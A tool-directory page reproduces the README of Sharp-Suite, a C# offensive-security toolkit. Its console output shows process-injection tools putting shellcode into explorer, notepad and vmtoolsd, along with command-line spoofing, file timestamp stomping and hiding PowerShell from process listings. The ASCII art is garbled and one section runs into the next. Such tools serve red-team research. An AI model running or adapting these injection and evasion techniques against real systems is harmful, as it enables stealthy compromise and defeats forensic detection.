Baike.dev
All toolsAI codingTrendingOpen sourceNewsSubmit
Log in
< Back to tools
S

Sharp-Suite

> 编程语言
Open source

Also known by Microsoft as Knifecoat :hot_pepper:

1.1K stars0 likes0 views
WebsiteGitHub

About

Also known by Microsoft as Knifecoat :hot_pepper:

Sharp-Suite

The king is dead, long live the king. I am starting a new repo with code samples in C#. My heart is still with PowerShell SwampThing.exe -l C:\Windows\System32\notepad.exe -f C:\aaa.txt -r C:\bbb.txt / :;
|l _____ |; 8o __-~ ~\ d| Swamp "88p;. -._\_;.oP Thing >,% (\ (./)8" ,;%%%: ./V^^^V' ;;;,-::::::'::\ ||
8888oooooo. :`^^^/,,~--.
oo.8888888888:((( o.ooo888 o88888888b )) 888b8888 b888888888;(.,"888b888\ .... b8888888:::::.8888. :::. :::OOO:::::::.OO' ; `. "``::::::''.' ~ b33f ~

[>] CreateProcess -> Suspended [+] PE Arch : 64-bit [+] Process Id : 10568 [+] PEB Base : 0xA3C2431000 [+] RTL_USER_PROCESS_PARAMETERS : 0x20DA9760000 [+] CommandLine : 0x20DA9760070 [+] UNICODE_STRING |-> Len : 66 |-> MaxLen : 68 |-> pBuff : 0x20DA9760658

[>] Rewrite -> RTL_USER_PROCESS_PARAMETERS [+] RtlCreateProcessParametersEx : 0xEAADF0 [+] RemoteAlloc : 0xEA0000 [+] Size : 1776 [?] Success, sleeping 500ms..

[>] Reverting RTL_USER_PROCESS_PARAMETERS [+] Local UNICODE_STRING : 0xEBC4D0 [+] Remote UNICODE_STRING.Buffer : 0x20DA9B10000 [+] pRTL_USER_PROCESS_PARAMETERS : 0x20DA9870FE0 [?] Success rewrote Len, MaxLen, Buffer..

…

C:> DesertNut.exe -i , ' . ' , . . ' . , . ' + + .-'''''-. .' . + . ________|| ___ : : | / || . '___ ____/ \ : : ||. _/ || ||\_______/ \ / \ : _/| : || / ,.|| ||
/ , ' . \ : =// : |'
____ || || || .
| __._/ | .' ___| \__ \\|| ||... , \ l|, ' ( / ,|...-' \ ' , __\||_//___ ___|____ \_/^\/||__ , . ,__ ||// \ . , _/~ ''~' _ ''( ....,||/ ' ..,... _/ -'/ -._ __ | \ || _______ . ' \ \ -.\ /(1,.. || / ______/''''

[+] Searching for Subclass property.. [>] PID: 10928, ImageName: explorer |-> ParentClassName: Progman, ChildClassName: SHELLDLL_DefView [+] Duplicating Subclass header.. [>] hProc: 0x378 [>] hProperty: 0x6B14DD0 |-> uRefs: 2, uAlloc: 3, uCleanup: 0 |-> dwThreadId: 5804, pFrameCur: 0 |-> pfnSubclass: 0x7FFA20E42280 --> comctl32!CallOriginalWndProc (?) |-> uIdSubclass: 0, dwRefData: 0x7FFA2E4C07D0 [+] Allocating remote shellcode.. |-> Sc Len: 344 |-> Sc Address: 0x3220000 [+] Rewriting local SUBCLASS_HEADER.. [+] Allocating remote SUBCLASS_HEADER.. |-> Subclass header Len: 48 |-> Subclass header Address: 0x3260000 [+] Updating original UxSubclassInfo subclass procedure.. [+] Trigger remote shellcode --> notepad.. [+] Restoring original UxSubclassInfo subclass procedure.. [+] Freeing remote SUBCLASS_HEADER & shellcode..

C:> DesertNut.exe -l , ' . ' , . . ' . , . ' + + .-'''''-. .' . + . ________|| ___ : : | / || . '___ ____/ \ : : ||. _/ || ||\_______/ \ / \ : _/| : || / ,.|| ||
/ , ' . \ : =// : |'
____ || || || .
| __._/ | .' ___| \__ \\|| ||... , \ l|, ' ( / ,|...-' \ ' , __\||_//___ ___|____ \_/^\/||__ , . ,__ ||// \ . , _/~ ''~' _ ''( ....,||/ ' ..,... _/ -'/ -._ __ | \ || _______ . ' \ \ -.\ /(1,.. || / ______/''''

[+] Subclassed Window Properties [>] PID: 10928, ImageName: explorer |-> hProperty: 0x1BC84BF0, hParentWnd: 0xA0710, hChildWnd: 0x100650 |-> ParentClassName: Shell_TrayWnd, ChildClassName: Start

[>] PID: 10928, ImageName: explorer |-> hProperty: 0x1BC84C70, hParentWnd: 0xA0710, hChildWnd: 0x1C064C |-> ParentClassName: Shell_TrayWnd, ChildClassName: TrayDummySearchControl

[>] PID: 10928, ImageName: explorer |-> hProperty: 0x12A64F0, hParentWnd: 0x1C064C, hChildWnd: 0x800E8 |-> ParentClassName: TrayDummySearchControl, ChildClassName: Button

[>] PID: 10928, ImageName: explorer |-> hProperty: 0x12A58F0, hParentWnd: 0x1C064C, hChildWnd: 0x1504A4 |-> ParentClassName: TrayDummySearchControl, ChildClassName: Static

[>] PID: 10928, ImageName: explorer |-> hProperty: 0x12A5870, hParentWnd: 0x1C064C, hChildWnd: 0x110814 |-> ParentClassName: TrayDummySearchControl, ChildClassName: ToolbarWindow32

[...Snipped...]

…

C:> WindfarmDynamite.exe -i . .. ..___ .__ , | ||\ |[__ ...._ _ | \ .._ .. _ *-+- _ |/|| || (][ [ | )|__/_|[ )(][ | )| | (/, ._|

[+] Validating Process.. [>] PID: 996, ImageName: explorer |-> hProc: 632, Arch: x64

[+] Leaking local WNF_SUBSCRIPTION_TABLE.. [>] TblPtr: 0x7FFD99CB5FA8, NtdllRVA: 1335208

[+] Remote WNF_SUBSCRIPTION_TABLE lookup.. [>] rNtdllBase: 0x7FFD99B70000, rWNFSubTable: 0x5A9120 |-> NameTable Flink: 0x4A6CA10, NameTable Blink: 0x5BB050

[+] Finding remote subscription -> WNF_SHEL_LOGON_COMPLETE [>] SubscriptionId: 0xB89, State Name: WNF_SHEL_LOGON_COMPLETE |-> WNF_USER_SUBSCRIPTION: 0x49C8E38 |-> Callback: 0x7FFD82F58C60 => twinui.dll!DllCanUnloadNow |-> Context: 0x2A12F40 => N/A

[+] Allocating remote shellcode.. [>] Sc Len: 344 [>] Sc Address: 0x27A0000

[+] Rewriting WNF subscription callback pointer.. [+] NtUpdateWnfStateData -> Trigger shellcode [+] Restoring WNF subscription callback pointer & deallocating shellcode..

C:> WindfarmDynamite.exe -l 4132 . .. ..___ .__ , | ||\ |[__ ...._ _ | \ .._ .. _ *-+- _ |/|| || (][ [ | )|__/_|[ )(][ | )| | (/, ._|

[+] Validating Process.. [>] PID: 4132, ImageName: vmtoolsd |-> hProc: 640, Arch: x64

[+] Leaking local WNF_SUBSCRIPTION_TABLE.. [>] TblPtr: 0x7FFD99CB5FA8, NtdllRVA: 1335208

[+] Remote WNF_SUBSCRIPTION_TABLE lookup.. [>] rNtdllBase: 0x7FFD99B70000, rWNFSubTable: 0x56B2F0 |-> NameTable Flink: 0x58EA30, NameTable Blink: 0x58F070

[+] Reading remote WNF subscriptions.. [>] SubscriptionId: 0x931, State Name: WNF_ENTR_EDPENFORCEMENTLEVEL_POLICY_VALUE_CHANGED |-> WNF_USER_SUBSCRIPTION: 0x4BB5B88 |-> Callback: 0x7FFD87505DF0 => edputil.dll!EdpIsUIPolicyEvaluationEnabledForThread |-> Context: 0x0 => N/A

[>] SubscriptionId: 0x8FA, State Name: WNF_DX_MODE_CHANGE_NOTIFICATION |-> WNF_USER_SUBSCRIPTION: 0x5B9658 |-> Callback: 0x7FFD96E5B230 => SHCore.dll!Ordinal126 |-> Context: 0xA1ECB0 => N/A

[>] SubscriptionId: 0x8F9, State Name: WNF_DX_MONITOR_CHANGE_NOTIFICATION |-> WNF_USER_SUBSCRIPTION: 0x5B9708 |-> Callback: 0x7FFD96E5B230 => SHCore.dll!Ordinal126 |-> Context: 0xA1ECB0 => N/A

[>] SubscriptionId: 0x8F8, State Name: WNF_SPI_LOGICALDPIOVERRIDE |-> WNF_USER_SUBSCRIPTION: 0x5BA368 |-> Callback: 0x7FFD96E5B230 => SHCore.dll!Ordinal126 |-> Context: 0xA1ECB0 => N/A

[>] SubscriptionId: 0x8F4, State Name: WNF_RPCF_FWMAN_RUNNING |-> WNF_USER_SUBSCRIPTION: 0x58F828 |-> Callback: 0x7FFD98610980 => rpcrt4.dll!NdrTypeSize |-> Context: 0x0 => N/A


### MaceTrap

MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders. These elements can be changed individually, in bulk or can be duplicated from an existing file or folder. Time permitting I will update MaceTrap to include comprehensive PE compile time stomping as well (header, import table, export table, debug directory, resources and fixing up the checksum).

C:> MaceTrap.exe

/-|-\   MACE

[++++||>>|===|+ -|-/ TRAP b33f

--~~--> Args? 1999-10-20 => "2001-01-02 14:13" => "2019-02-19 01:01:01.111" -c (-Create) Boolean flag, overwrite CreationTime -a (-Access) Boolean flag, overwrite LastAccessTime -w (-Write) Boolean flag, overwrite LastWriteTime

--~~--> Usage? UrbanBishop.exe -i 3380 -p C:\Users\b33f\Desktop\sc.bin -c O _____ _ / //\ | | || |_ ___ ___ { } | | | _| . | .'| | _/ ||| |_|,||| (_) || _____ _ _ / \ | __ |_|| | ___ ___ () | __ -| | -| | . | . | () ||_||||| | /__\ || b33f

|-------- | Process : notepad | Handle : 828 | Is x32 : False

Sc binpath : C:\Users\b33f\Desktop\sc.bin

[>] Creating local section.. |-> hSection: 0x338 |-> Size: 31361 |-> pBase: 0x2470000 [>] Map RX section to remote proc.. |-> pRemoteBase: 0x16967970000 [>] Write shellcode to local section.. |-> Size: 31361 [>] Seek export offset.. |-> pRemoteNtDllBase: 0x7FFDE64A0000 |-> LdrGetDllHandle OK |-> RtlExitUserThread: 0x7FFDE650CF10 |-> Offset: 0x6CF10 [>] NtCreateThreadEx -> RtlExitUserThread Success [>] Set APC trigger & resume thread.. |-> NtQueueApcThread |-> NtAlertResumeThread [>] Waiting for payload to finish.. |-> Thread exit status -> 0 |-> NtUnmapViewOfSection

…
          .---.        .-----------
         /     \  __  /    ------
        / /     \(  )/    -----  Atomic
       //////   ' \/ `   ---       Bird
      //// / // :    : ---
     // /   /  /`    '--
    //          //..\\      ~b33f~
           ====UU====UU====
               '//||\\`
                 ''``

Called ==> SystemProcessInformation Called ==> SystemProcessInformation Called ==> SystemProcessInformation Called ==> SystemProcessInformation Called ==> SystemProcessInformation [!] Found Powershell => rewriting linked list Called ==> SystemProcessInformation [!] Found Powershell => rewriting linked list Called ==> SystemProcessInformation [!] Found Powershell => rewriting linked list Called ==> SystemProcessInformation [!] Found Powershell => rewriting linked list Called ==> SystemProcessInformation [!] Found Powershell => rewriting linked list [!] Found Powershell => rewriting linked list

[...Snipped...]

…

C:> Londor.exe __ _ | | ___ ___ | |__ ___ | || . | | . | . | | ||||||||

                     ~b33f

----> Args? ----> Usage? Londor.exe -t Coverage -s "C:\Windows\System32\notepad.exe" -o C:\Users\b33f\Desktop\test.drcov -a "C:\Users\b33f\Desktop\bla.txt" __ _ | | ___ ___ | |__ ___ | || . | | . | . | | ||||||||

                     ~b33f

[>] Spawning process for coverage.. |-> PID: 5260; Path: C:\Windows\System32\notepad.exe |-> Script loaded

[*] Press ctrl-c to detach..

[+] Block trace Length: 107160 |-> BBS slice: 13395; Total BBS: 13395 [+] Block trace Length: 18456 |-> BBS slice: 2307; Total BBS: 15702 [+] Block trace Length: 76032 |-> BBS slice: 9504; Total BBS: 25206 [+] Block trace Length: 22216 |-> BBS slice: 2777; Total BBS: 27983 [+] Block trace Length:

Issues· 0 open

View all issuesOpen on GitHub

No open issues yet, or sync has not completed.

> Tags

C#

No comments yet. Be the first to share.

> Details

PublishedAug 1, 2026
UpdatedSep 17, 2026
Category编程语言
PricingOpen source

> Related tools

T
TypeScript
JavaScript 的超集,为前端与全栈提供静态类型
P
Python
通用编程语言,广泛用于 Web、数据与 AI
G
Go
Google 推出的简洁高效系统语言